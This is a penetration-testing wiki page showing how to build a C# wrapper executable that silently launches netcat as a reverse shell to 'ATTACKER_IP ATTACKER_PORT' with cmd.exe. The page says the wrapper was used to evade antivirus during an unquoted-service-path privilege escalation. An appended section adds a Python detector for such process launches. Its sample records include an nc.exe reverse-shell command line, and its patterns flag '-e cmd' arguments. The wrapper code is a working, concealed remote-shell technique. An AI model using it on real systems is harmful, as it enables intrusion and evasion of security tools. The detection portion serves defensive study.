# Executable Obfuscation

{% hint style="info" %}
This technique was used to bypass AV while exploiting an [Unquoted Service Path](/windows-privilege-escalation/service-permissions/unquoted-service-paths.md).
{% endhint %}

Make an executable using C#. Start with the imports:

```csharp
using System;
using System.Diagnostics;
```

These lines give us access to basic system functions, such as starting new processes (netcat in this case).

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            //Insert rest of code here!
        }
    }
}
```

This initializes a namespace and a class for the program itself.

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
        }
    }
}
```

This creates the `Process` object for netcat and sets its executable path and parameters.

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
            procInfo.CreateNoWindow = true;
        }
    }
}
```

The added line, `procInfo.CreateNoWindow = true;`, makes it **NOT** create a new window while starting.

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
            procInfo.CreateNoWindow = true;
            proc.StartInfo = procInfo;
            proc.Start();
        }
    }
}
```

The last added lines assign the start info to the process and fire off the new process with `proc.Start()`.

Compile the source code with `mcs`, the Mono C# compiler:

```
mcs wrapper.cs
```
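Seen from the detection side, the wrapper only changes the file sitting on the service path; `proc.Start()` still creates a child process whose image path and arguments are recorded by process-creation logging. The example below is added here and is not code from the original page: it scores constructed records that use Sysmon Event ID 1 field names, and the sample paths, the 192.0.2.10 address and the function names are assumptions.

```python
import re

# Constructed process-creation records using Sysmon Event ID 1 field names.
# All paths and the 192.0.2.10 address are sample values, not from the page.
EVENTS = [
    {"Image": r"C:\Windows\Temp\nc.exe",
     "CommandLine": r"c:\windows\temp\nc.exe 192.0.2.10 4444 -e cmd.exe",
     "ParentImage": r"C:\Program Files\Example.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo done",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\Temp\setup-helper.exe",
     "CommandLine": r"C:\Windows\Temp\setup-helper.exe /quiet",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]

TEMP_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")
SHELL_EXEC = re.compile(r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b", re.I)
IP_PORT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b")


def findings(event):
    """Return the reasons one process-creation record looks suspicious."""
    reasons = []
    image = event["Image"].lower()
    cmdline = event["CommandLine"]
    if any(d in image for d in TEMP_DIRS):
        reasons.append("image runs from a temp directory")
    if SHELL_EXEC.search(cmdline):
        reasons.append("-e hands a command shell to the process")
    if IP_PORT.search(cmdline):
        reasons.append("IP address and port passed as arguments")
    return reasons


def triage(events, threshold=2):
    """Keep records with at least `threshold` reasons, noting the parent."""
    hits = []
    for ev in events:
        reasons = findings(ev)
        if len(reasons) >= threshold:
            hits.append((ev["ParentImage"], ev["Image"], reasons))
    return hits


if __name__ == "__main__":
    for parent, image, reasons in triage(EVENTS):
        print(f"{parent} -> {image}: {'; '.join(reasons)}")
```

The rules key on the child's command line and location rather than on a file name or hash, so they are unaffected by what the parent executable looks like on disk.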


